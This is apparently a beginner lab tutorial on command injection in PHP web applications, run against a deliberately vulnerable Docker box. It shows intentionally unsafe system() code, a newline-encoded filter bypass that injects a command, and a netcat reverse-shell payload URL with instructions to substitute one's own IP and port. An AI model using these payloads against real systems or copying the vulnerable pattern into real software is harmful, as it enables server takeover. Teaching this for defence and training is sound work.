Command Injection Vulnerabilities: In-Depth Explanation

Beginner

Introduction

In this lab, you will learn about command injection vulnerabilities, which are one of the most common vulnerabilities in web applications. The lab provides a hands-on experience to understand the principles of command injection vulnerabilities and their exploitation techniques. Through two practical exercises, you will learn how to identify and exploit command injection vulnerabilities, understand the usage of wildcard characters for closing commands, and explore methods to bypass filters and escalate privileges.

Understanding Command Injection Vulnerabilities

In this step. We're going to explore the basics of command injection vulnerabilities and how you can exploit them, all in a simple and beginner-friendly way.

So, what are command injection vulnerabilities? They happen when a web application doesn't properly handle user input and it ends up being used in system commands. This could potentially allow a malicious user to execute any command they want on the server, with the same permissions as the web application.

Let's look at a piece of PHP code that has this vulnerability:

<?php
$action = $_GET['cmd'];
echo "<pre>";
system($action);
echo "<pre/>";
?>

In this code, the system() function is used to execute a command that comes from the cmd parameter in the URL. A malicious user can take advantage of this by adding harmful commands into the cmd parameter.

To successfully exploit this vulnerability, you need to know how to cancel the original command and add more commands. This is done using command separators such as ; (semi-colon), && (logical AND), | (pipe), or || (logical OR).

Exploiting Command Injection Vulnerabilities

Welcome to the next stage of our journey! Now, we're going to put our knowledge into practice and exploit a command injection vulnerability in a web application.

To begin, let's set up our lab environment. Please use the following command:

docker run -d -p 82:80 --name pentesterlab-WebforPentest-1  -it jewel591/vulnbox:pentesterlab-WebforPentest-1 /bin/sh -c 'service apache2 start && tail -f /var/log/apache2/error.log' --registry-mirror='https://registry.docker-cn.com'

Let's take a look at the following PHP code that has this vulnerability:

<?php
if (!(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}$/m', $_GET['ip']))) {
    die("Invalid IP address");
}
system("ping -c 2 ".$_GET['ip']);
?>

In this code, the user input ($_GET['ip']) is checked with a regular expression to make sure it's in the format of an IP address. If the input is valid, the system() function runs the ping command using the user input as an argument.

But what if we want to bypass this filter and inject our own commands? That's where the newline character %0a comes in handy. It's used in the URL-encoded format.

For instance, if you want to run the uname -a command, you can use the following URL:

http://127.0.0.1:82/vulnerable.php?ip=127.0.0.1%0auname%20-a

The result look like following:

ping_and_cmd

This clever trick bypasses the IP address filter and executes the uname -a command right after the ping command. It's a practical example of how knowledge can be used to identify and exploit vulnerabilities. Let's continue our learning journey!

Privilege Escalation and Further Exploitation

Great job on making it this far! Once you've successfully exploited a command injection vulnerability, you can level up your game. You might want to try escalating privileges or conducting more detailed reconnaissance on the target system.

A popular technique is to create a reverse shell connection. This gives you an interactive shell on the target system, and you can do this using tools like netcat (nc) or bash.

Here's an example how you can establish a reverse shell using netcat (must installed in the target machine):

http://127.0.0.1:82/commandexec/example1.php?ip=127.0.0.1;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%20127.0.0.1%205555%20%3E/tmp/f

The reverse shell command execute result must look like following:

reverse shell

Just replace the second 127.0.0.1 and 5555 with the IP address and port number you want to use. It's like filling in the blanks!

Alternatively, you can also try to find sensitive files on the target system. This could give you valuable information for further exploits or privilege escalation. This is a bit like being a detective, but in the digital world!

Remember, practice makes perfect. Keep exploring and learning, and you'll become a pro at this in no time!

Summary

In this lab, you learned about command injection vulnerabilities, which occur when user input is improperly handled and passed to system commands in a web application. You explored how to exploit these vulnerabilities by injecting malicious commands and closing the original command using separators like ;, &&, |, and ||. Additionally, you practiced bypassing filters using techniques like encoding newline characters. Finally, you gained an understanding of potential next steps after exploiting a command injection vulnerability, such as establishing a reverse shell or enumerating sensitive files for further exploitation or privilege escalation.

Other Tutorials you may like